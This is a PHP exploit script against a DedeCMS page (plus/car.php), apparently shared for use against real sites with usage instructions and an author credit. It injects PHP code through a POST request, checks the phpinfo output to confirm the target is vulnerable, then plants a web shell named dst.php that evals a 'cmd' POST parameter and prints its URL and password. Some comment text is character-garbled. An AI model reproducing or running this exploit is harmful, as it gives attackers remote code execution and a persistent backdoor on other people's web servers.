1.<?php 2.$host=$argv[1];3.$path=$argv[2];4.$path=$path."plus/car.php";5.$url=$path;6.if(count($argv) < 3 ){7.print_r('8.Usage: php '.$argv[0].' host path9.Example:10.php '.$argv[0].' www.site.com /dede/11.ߣ http://t.qq.com/wulinlw12.޸ģС13.');14.exit;15.}16.$data='$a=${@phpinfo()};';17.$buffer = POST($host,80,$url,$data,30);18.preg_match("/allow_url_fopen/i", $buffer, $arr_suc);19. 20.$str="allow_url_fopen";21.if($arr_suc[0]==$str) {22.echo "Congratulations,target exist this bug.\n";23.$data='$a=${@file_put_contents("dst.php","<?php eval(\$_POST[cmd]); ?>")};';24.$buffer = POST($host,80,$url,$data,30);25.echo "shell:http://$host$argv[2]plus/dst.php,pass:cmd.";26.}27.else {28.echo "Sorry,target may not exist this bug.";29.exit;30.}31.function POST($host,$port,$path,$data,$timeout, $cookie='') {32.$buffer='';33.$fp = fsockopen($host,$port,$errno,$errstr,$timeout);34.if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno); 35.else {36.fputs($fp, "POST $path HTTP/1.0\r\n");37.fputs($fp, "Host: $host\r\n");38.fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");39.fputs($fp, "Content-length: ".strlen($data)."\r\n");40.fputs($fp, "Connection: close\r\n\r\n");41.fputs($fp, $data."\r\n\r\n");42. 43.while(!feof($fp)) 44.{45.$buffer .= fgets($fp,4096);46.} 47.fclose($fp);48.} 49.return $buffer;50.} 51.?>